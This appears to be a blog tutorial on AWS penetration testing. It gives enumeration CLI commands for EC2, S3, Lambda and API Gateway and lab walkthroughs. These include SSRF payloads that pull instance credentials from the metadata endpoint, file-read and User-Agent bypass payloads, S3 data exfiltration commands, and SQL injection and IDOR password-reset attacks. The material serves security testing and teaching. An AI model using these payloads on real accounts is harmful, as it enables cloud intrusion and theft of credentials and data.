Cloud environments have evolved in recent years with more and more companies migrating to cloud infrastructure hosted by providers like Amazon Web Services (AWS). As companies migrate their infrastructure to the cloud, they face new challenges, especially within the framework of the Shared Responsibility Model. This model, while empowering, introduces fresh vulnerabilities that can significantly impact a company’s security landscape.
In this post, we will cover existing testing methodologies and the specific steps required to conduct an AWS penetration test. Additionally, I’ve included a brief introduction to Amazon Web Services, the attack vectors of the AWS platform, and the dangers of cloud environments, all highly recommended reading if you are new to cloud pen-testing or AWS.
1) Existing AWS testing methodologies
Testing and auditing AWS services for penetration testing purposes requires deep technical knowledge of all available configurations and their possible security implications. Below, I explain the two common methodologies and sources of security-configuration guidance for AWS.
2) AWS
Amazon Web Services itself is probably the best starting point to learn about the general security of AWS and its services via their Best Practices for Security, Identity, and Compliance. Each service has its documentation which can be selected via the AWS Documentation page. This documentation is also useful in a penetration test, especially if a lesser-known AWS service is used.
The Shared Responsibility Model
AWS uses a Shared Responsibility Model, divided into Security of the Cloud (AWS’s responsibility) and Security in the Cloud (the customer’s responsibility). With Security of the Cloud, AWS ensures the availability, management, and security of AWS services. This includes maintaining updates and security patches on the infrastructure the services run on, as well as the virtualization layers, the physical security of the facilities, and redundant services.
With Security in the Cloud, customers are responsible for securing the services they choose. For Infrastructure as a Service (IaaS) offerings, like an EC2 instance, customers need to configure and secure the instance extensively, including tasks such as installing updates and patches and setting up network firewalls. On the other hand, more abstracted services like Amazon S3 buckets require less customer configuration, since AWS manages the underlying infrastructure and operating system.
Most important are the configuration steps the customer must take to manage the data used in the services and to apply appropriate access permissions.
3) CIS Benchmarks
The Center for Internet Security (CIS) provides free access to the Amazon Web Services Benchmark documents via its website. Available documents directly related to Amazon Web Services include:
- CIS AWS Foundations Benchmark v1.5.0
- CIS AWS End User Compute Services Benchmark v1.0.0
- CIS AWS Three-tier Web Architecture Benchmark v1.0.0
These documents focus on the general security configuration of an AWS platform and can serve as the basis for security audits.
4) Cloud Assessment and Cloud Penetration Testing
Purpose:
- Cloud Audit: The primary purpose of a cloud audit is to assess and ensure compliance with predefined standards, regulations, and security policies. It focuses on evaluating the adherence of cloud infrastructure to industry-specific requirements and internal policies.
- Cloud Penetration Testing: Penetration testing aims to identify and exploit vulnerabilities in a system. In the context of the cloud, it involves actively simulating cyberattacks to assess the security of the infrastructure, applications, and data. The goal is to find and address weaknesses before malicious actors can exploit them.
Outcome:
- Cloud Audit: The outcome of a cloud audit is an assessment of the cloud environment’s compliance status. It provides a report on whether the organization meets the required standards and regulations.
- Cloud Penetration Testing: The outcome of penetration testing is a detailed analysis of vulnerabilities discovered, potential exploits, and recommendations for improving security. It helps organizations understand their risk posture and enhance their security posture.
5) Importance of Penetration Testing on AWS Environments
Cloud providers make it easier for companies to dynamically create new services, request resources as needed, and outsource IT tasks. However, cloud environments are still evolving, which may introduce new vulnerabilities to the infrastructure; especially under the Shared Responsibility Model, migrating content to the cloud may introduce new risks to a company’s threat model.
Now, let’s shift our focus to a more detailed examination of AWS penetration testing, building upon the general information provided earlier.
6) Identify the Attack Surface
In a cloud penetration test, the initial step involves identifying, beyond the scoping process, the following aspects:
- Services utilized by the application (e.g., EC2 vs Lambda)
- Externally exposed services (e.g., S3 bucket with static CSS files and DynamoDB)
- Determining whether services are managed by AWS or the customer.
This process also entails enumerating and fingerprinting the cloud infrastructure to identify used components and any third-party software in place.
Which Techniques Are Commonly Used in AWS Penetration Testing Along an Attack Path?
In this section, we assume that we are already performing a cloud penetration test against a vulnerable application that uses various AWS services. I will cover penetration testing for the most commonly used AWS services. Before discussing testing techniques in each section, I will briefly explain the service in question, and I will include the commands used during the tests. Let’s start.
6.1) Pentesting AWS Elastic Compute Cloud (EC2)
Amazon Elastic Compute Cloud (Amazon EC2) is a core web service offered by Amazon Web Services (AWS). EC2 provides resizable compute capacity in the cloud, allowing users to run virtual servers, known as instances, which can be quickly scaled up or down based on demand. Amazon Machine Images (AMIs) are the images used to create these virtual machines. Since it is possible to create a malicious image to compromise users, the EC2 service is a prime attack surface for AWS penetration testing.
a. Common Attack Vectors Targeting EC2:
- Weak Authentication: Using weak or default credentials for accessing EC2 instances can make them vulnerable to unauthorized access. It is essential to use strong, unique passwords or SSH keys.
- Open Ports and Services: Unused or unnecessary ports and services running on EC2 instances can be potential entry points for attackers. It’s essential to minimize the attack surface by closing unnecessary ports and services.
- Instance Metadata Exploitation: Attackers may attempt to exploit AWS instance metadata to gain unauthorized access or gather information about the EC2 instance. It’s crucial to restrict access to metadata and use appropriate IAM roles.
- Insecure AMIs (Amazon Machine Images): Using outdated or community AMIs that have not been properly vetted can introduce security vulnerabilities. It’s recommended to use official and regularly updated AMIs.
- Privilege Escalation: Insecure configurations or mismanagement of AWS Identity and Access Management (IAM) roles may lead to privilege escalation, allowing unauthorized users to gain elevated permissions.
b. Enumeration:
Enumerate information about the EC2 instances. EC2 Instance Connect is an IAM permission that can be granted to a user, enabling temporary connections to an instance. Enumeration should cover public IP addresses, private IP addresses, DNS names, security groups, IAM roles, and metadata.
- Identify all EC2 instances’ public IP addresses and associated DNS names.
- Enumerate private IP addresses for internal communication and interaction with VPC.
- Identify security groups associated with each EC2 instance.
- Gather details about the VPC, subnets, and routing.
- List IAM users and roles associated with EC2 instances.
- Determine the OS version and patch level of each EC2 instance, and identify any known vulnerabilities associated with those versions.
- Enumerate installed software and services on EC2 instances. Assess the versioning to identify any outdated or vulnerable software.
- Listing information about all instances (aws ec2 describe-instances)
- Listing information about a specific region (aws ec2 describe-instances --region region)
- Listing information about a specific instance (aws ec2 describe-instances --instance-ids ID)
- Extracting the UserData attribute of a specified instance (aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID). This command retrieves the user data provisioned to the instance, such as bootstrap commands or secrets; the output is base64-encoded.
- Listing the roles of an instance (aws ec2 describe-iam-instance-profile-associations)
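The UserData value returned by describe-instance-attribute is base64-encoded. A minimal decoding sketch, using a made-up sample value rather than output from a real instance:

```shell
# Hypothetical base64 UserData value; in practice, extract it from the JSON
# output first (e.g. with --query 'UserData.Value' --output text).
user_data="IyEvYmluL2Jhc2gK"

# Decoding reveals bootstrap commands and, sometimes, embedded secrets.
decoded=$(echo "$user_data" | base64 -d)
echo "$decoded"   # → #!/bin/bash
```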
c. Vulnerability Scanning:
Amazon Inspector – Utilize Amazon Inspector for agent-based vulnerability scanning on EC2 instances. Ensure that the Inspector agent is properly installed and configured on target instances.
Third-Party Scanning Tools – Depending on company preferences and tool availability, we can use Nessus, Burp Suite, or Qualys; custom scripts can also be used.
Findings in the scan results should be validated to rule out false positives.
d. Exploitation: Initial access typically happens via RCE or SSRF. The instance metadata service can then be used to exfiltrate information from the instance.
Remote Code Execution – if we have remote code execution or SSRF, we can grab metadata information:
- curl http://<ip address>/latest/meta-data
To grab the credentials used to access the instance:
- curl http://<ip address>/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
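On instances that enforce IMDSv2, the plain GETs above return 401 and a session token must be fetched first via a PUT request (which is exactly why IMDSv2 blunts simple SSRF). A sketch of the request pair, assembled as strings here since the 169.254.169.254 endpoint is only reachable from inside an instance:

```shell
IMDS="http://169.254.169.254"

# Step 1: request a session token (TTL in seconds, max 21600).
token_req="curl -s -X PUT ${IMDS}/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600'"

# Step 2: attach the token to every metadata request as a header.
creds_req="curl -s ${IMDS}/latest/meta-data/iam/security-credentials/ -H 'X-aws-ec2-metadata-token: \$TOKEN'"

echo "$token_req"
echo "$creds_req"
```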
Now, I will demonstrate how to exploit an SSRF vulnerability on the vulnerable EC2 instance in the test environment.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Vulnerable Instance”.
Step 3: Click on “Lab Access” to open the lab tab.
Step 4: Here I test for SSRF first, because it is one of the most common attack vectors in AWS EC2 penetration testing. I found an SSRF vulnerability in the web application and confirmed it by supplying a Burp Collaborator link.
Step 5: Now I entered the URL “http://169.254.169.254/” to read EC2 metadata, as shown in the screenshot below. The address 169.254.169.254 is a link-local “magic” IP in the cloud world. See “https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html” for more information about instance metadata.
Step 6: Enter http://169.254.169.254/latest/ URL to read metadata.
Step 7: Enter “http://169.254.169.254/latest/user-data” to check the user data.
As I can observe, the user cloudlab moved the “f149.txt” file to the root directory.
Step 8: Now enter “file:///f149.txt” payload to read the file.
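The whole chain above can be replayed from the command line. The host and parameter name below are placeholders for illustration (take the real ones from the lab’s request); only the command strings are generated here:

```shell
LAB="http://<lab-host>/page"   # placeholder for the lab endpoint
PARAM="url"                    # assumed name of the vulnerable parameter

# Payloads mirroring steps 5-8: metadata root, user data, then the flag file.
payloads="http://169.254.169.254/latest/
http://169.254.169.254/latest/user-data
file:///f149.txt"

probe_cmds=$(for p in $payloads; do
  echo "curl -s \"${LAB}?${PARAM}=${p}\""
done)
echo "$probe_cmds"
```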
6.2) Pentesting AWS Simple Storage Service Buckets (S3 Buckets)
Amazon S3, or Amazon Simple Storage Service, is a service offered by Amazon Web Services that provides object storage through a web service interface. Data in S3 is organized into buckets; think of a bucket as a top-level folder or directory where we can store and organize our data. Each bucket has a globally unique name within the AWS S3 namespace, and objects within a bucket are addressed using unique keys. S3 buckets are one of the most popular attack surfaces in AWS infrastructures, and they are among the most prone to attack.
a. Common Attack Vectors Targeting S3:
- Unsecured Buckets: Misconfigured bucket permissions can lead to unauthorized access. If a bucket is set to public access or has overly permissive access controls, it may expose sensitive data.
- Insecure Direct Object References (IDOR): If S3 bucket URLs or object references are predictable, attackers might be able to access or manipulate objects directly.
- Data Exposure: Leakage of sensitive data due to misconfigured or publicly accessible buckets can result in data exposure. This includes unintentional exposure of personally identifiable information (PII) or sensitive data.
- Bucket Enumeration: Attackers may try to identify valid bucket names through brute force or other means, potentially leading to unauthorized access.
b. Enumeration:
- Listing all buckets in the AWS account
- aws s3api list-buckets
- Getting the ACL of a specific bucket
- aws s3api get-bucket-acl --bucket name
- Getting the policy of a specific bucket
- aws s3api get-bucket-policy --bucket name
- Getting the Public Access Block configuration for an S3 bucket
- aws s3api get-public-access-block --bucket name
- Listing all objects in a specific bucket
- aws s3api list-objects --bucket name
- Getting ACL information about a specific object
- aws s3api get-object-acl --bucket name --key object_name
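The per-bucket commands above are easy to wrap into a sweep over every bucket the credentials can see. A sketch that only generates the command list (running it for real needs configured credentials):

```shell
# Emit the enumeration commands for a single bucket name.
s3_enum_cmds() {
  b="$1"
  echo "aws s3api get-bucket-acl --bucket $b"
  echo "aws s3api get-bucket-policy --bucket $b"
  echo "aws s3api get-public-access-block --bucket $b"
  echo "aws s3api list-objects --bucket $b"
}

# Example with a hypothetical bucket name.
s3_enum_cmds "example-bucket"
```

In a live engagement, feed the function from `aws s3api list-buckets --query 'Buckets[].Name' --output text`; an AccessDenied on one call but not another is itself useful signal about the bucket’s configuration.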
Data Exfiltration
- It’s possible to brute-force files in the bucket.
- If the bucket is misconfigured, we can read data through a web browser, the CLI/API, or a time-limited (presigned) URL.
Public Access: Just enter the URL in the browser
https://bucket-name.s3.region.amazonaws.com/test.txt
Authenticated User:
aws s3api get-object --bucket name --key object-name download-file-location
Time-Based URL: Generate a presigned, time-limited URL for an object, useful if the object is not public.
aws s3 presign s3://bucket-name/object-name --expires-in 604800
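One caveat before leaning on presigned URLs: with Signature Version 4 the maximum lifetime is seven days, and larger values make the CLI refuse to sign. A quick sketch of the cap:

```shell
# Maximum presigned-URL lifetime under SigV4: 7 days, expressed in seconds.
MAX_EXPIRY=$((7 * 24 * 60 * 60))
echo "$MAX_EXPIRY"   # → 604800

# The presign command pinned to the maximum allowed lifetime.
echo "aws s3 presign s3://bucket-name/object-name --expires-in $MAX_EXPIRY"
```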
Now I will show you step by step a simple CTF solution regarding S3 from the vulnmachines.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Misconfigured Bucket”.
Step 3: Click on “Lab Access” to open the lab tab.
Step 4: Now let’s try to list all objects by modifying the URL as shown in the screenshot below.
Here, the bucket “vnm-sec-aws” is not public, so it will not allow users to list all objects.
Step 5: Now, I will use the AWS CLI to list all the objects of the “vnm-sec-aws” bucket. Use “https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html” to set up the AWS CLI and run “aws configure” to add credentials, as shown in the screenshot below.
Step 6: As the “vnm-sec-aws” bucket allows any authenticated user to read all of its objects, I can use the “aws s3 ls s3://vnm-sec-aws/ --recursive” command to list them, as shown in the screenshot below.
Step 7: I can copy flag.txt file using the command “aws s3 cp s3://vnm-sec-aws/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/flag.txt .”
Step 8: Finally, read the flag with the cat command on a Linux system.
Let’s continue with another S3 pentest scenario. We have lab access, as seen in the screenshot below.
Step 1: First, I perform recon on the lab URL to identify hidden files. Using the dirb tool, I found the “secret.html” file.
Step 2 : I accessed the “http://54.84.44.100/secret.html” URL.
Here I can observe that the “f149.txt” URL appears multiple times, along with a note that I can access f149.txt if my “User-Agent” header value is “VnMSecurityLab”.
Step 3: I accessed each URL individually and intercepted the traffic using Burp Suite. The URLs returned 403 Forbidden responses.
Subsequently, I modified the value of the “User-Agent” header, and with that the bucket policy was bypassed.
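The same bypass works without Burp, straight from curl. The IP and file name come from the lab above; the commands are assembled as strings so nothing is fired at the lab host from this sketch:

```shell
TARGET="http://54.84.44.100/f149.txt"

# Default User-Agent: the bucket policy denies the request (403 Forbidden).
denied="curl -s -o /dev/null -w '%{http_code}' $TARGET"

# Spoofed User-Agent matching the policy condition: the object is served.
allowed="curl -s -A 'VnMSecurityLab' $TARGET"

echo "$denied"
echo "$allowed"
```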
6.3) Penetration testing AWS Lambda & API Gateway
AWS Lambda is a powerful serverless service that enables us to create functions and applications without managing server infrastructure. We can develop a Lambda function containing our code and set up a trigger; the function executes when the trigger fires. Lambda supports various programming languages, and we can even set up custom runtimes. API Gateway is an AWS service for creating, publishing, maintaining, monitoring, and securing REST, HTTP, and WebSocket APIs. API Gateway can be used to trigger Lambda functions synchronously (API Gateway), asynchronously (event), or via streams (poll-based).
a.) Common Attack Vectors Targeting Lambda & API Gateway:
- Injection Attacks: Malicious input data can lead to code injection vulnerabilities, especially if proper input validation is not implemented.
- Cross-Site Scripting (XSS): If user input is not properly sanitized, it may lead to XSS attacks, especially in scenarios involving API Gateway and frontend applications.
- Data Exposure: Inadequate protection of sensitive data during transit or storage within Lambda functions or API Gateway endpoints can lead to data exposure.
- Unauthorized Access: Insufficient authentication and authorization mechanisms can allow unauthorized users to invoke Lambda functions or access API Gateway resources.
b.) Enumeration:
- Listing all Lambda functions
- aws lambda list-functions
- Listing information about a specific Lambda function
- aws lambda get-function --function-name function_name (this command also enables us to download the source code of the Lambda function)
- Listing the resource policy of a function
- aws lambda get-policy --function-name function_name (this shows who can execute the function, its ID, and other details)
- Listing the event source mappings of a Lambda function
- aws lambda list-event-source-mappings --function-name function_name
- Listing Lambda layers (dependencies)
- aws lambda list-layers
- Listing full information about a Lambda layer
- aws lambda get-layer-version --layer-name name --version-number version_number
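The Code.Location field returned by get-function is a short-lived presigned URL to the function’s deployment package. A sketch of pulling the source down, generated as command strings since live credentials are required; the function name is a placeholder:

```shell
FN="function_name"   # placeholder function name

# Extract only the presigned package URL from get-function's JSON output.
get_url="aws lambda get-function --function-name $FN --query 'Code.Location' --output text"

# Fetch the zip via the presigned URL and unpack it to read the source.
fetch="curl -s -o ${FN}.zip \"\$(${get_url})\" && unzip -o ${FN}.zip -d ${FN}_src"

echo "$get_url"
echo "$fetch"
```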
If API Gateway is used, we can enumerate APIs to see how it can invoke the lambda function.
- Listing REST APIs
- aws apigateway get-rest-apis
- Listing information about endpoints
- aws apigateway get-resources --rest-api-id ID
- Listing method information for an endpoint
- aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
- Listing all stages (versions) of a REST API
- aws apigateway get-stages --rest-api-id ID
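Once an API ID, stage, and resource path are known from the commands above, the public invoke URL follows a fixed pattern; a sketch assembling it with placeholder values:

```shell
API_ID="a1b2c3"      # from get-rest-apis (placeholder)
REGION="us-east-1"   # region the API is deployed in (placeholder)
STAGE="prod"         # from get-stages (placeholder)
RESOURCE="/items"    # from get-resources (placeholder)

# Standard API Gateway invoke-URL pattern:
# https://{api-id}.execute-api.{region}.amazonaws.com/{stage}{resource}
invoke_url="https://${API_ID}.execute-api.${REGION}.amazonaws.com/${STAGE}${RESOURCE}"
echo "$invoke_url"   # → https://a1b2c3.execute-api.us-east-1.amazonaws.com/prod/items
```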
Now, let’s test the web service that uses the vulnerable lambda function in a laboratory environment.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Misconfigured Bucket”.
Step 3: Click on “Lab Access” to open the lab tab.
Step 4: I perform recon to identify URL parameters using the “Param Miner” Burp extension. First, capture the vuln-lambda request and send it to Repeater; then right-click and choose Extensions > Param Miner > Guess params > Guess GET parameters.
I found the “command” parameter with the Param Miner extension.
Step 5: I tried to find the command injection vulnerability as shown in the screenshot below.
Finally, I will demonstrate step by step how to exploit vulnerabilities in AWS services using the laboratory environment called AWSGoat, which contains multiple vulnerabilities. If you want to install AWSGoat, see https://github.com/ine-labs/AWSGoat for instructions. Let’s start.
SQL Injection:
I created an account named ‘Test’ during the registration process. After logging in, I explored the platform, visited the user page, noticed a search button, and decided to test for SQL injection vulnerabilities first. With basic payloads I was able to read other users’ information from the database, as seen in the screenshots below.
Insecure Direct Object Reference (IDOR) Vulnerability:
After harvesting user IDs via the SQL injection vulnerability, I navigated to the password reset section. I changed my own password, captured the request, and sent it to Repeater.
I then attempted to reset the password of the user with ID 3 and succeeded.
Sensitive Data Exposure in Misconfigured S3 buckets:
I returned to the home page. There were numerous blog posts available. I then inspected the website source and found the links to the buckets for displaying their contents.
I tried to view the contents of the buckets.
The dev-blog bucket is useful to me: I can see SSH config files and some SSH keys in the output.
I downloaded the SSH config and retrieved the IP addresses and hostnames. I also got the SSH private key paths.
To sum up, misconfigured S3 buckets lead to the exposure of sensitive data, as seen in the scenario.
Conclusion
AWS pentesting is an ongoing process that demands a diverse knowledge base and unwavering dedication. With AWS consistently introducing new services and functionalities, security checks and attack strategies require continual updates. As a pentester, declaring the completion of AWS environment testing can be challenging due to its vast and complex nature. It is crucial to encompass a wide array of services and attacks within the agreed-upon timeline with the client. I trust that the insights gained from this blog post on real-world AWS penetration testing will prove beneficial in your work.
Stay safe 😊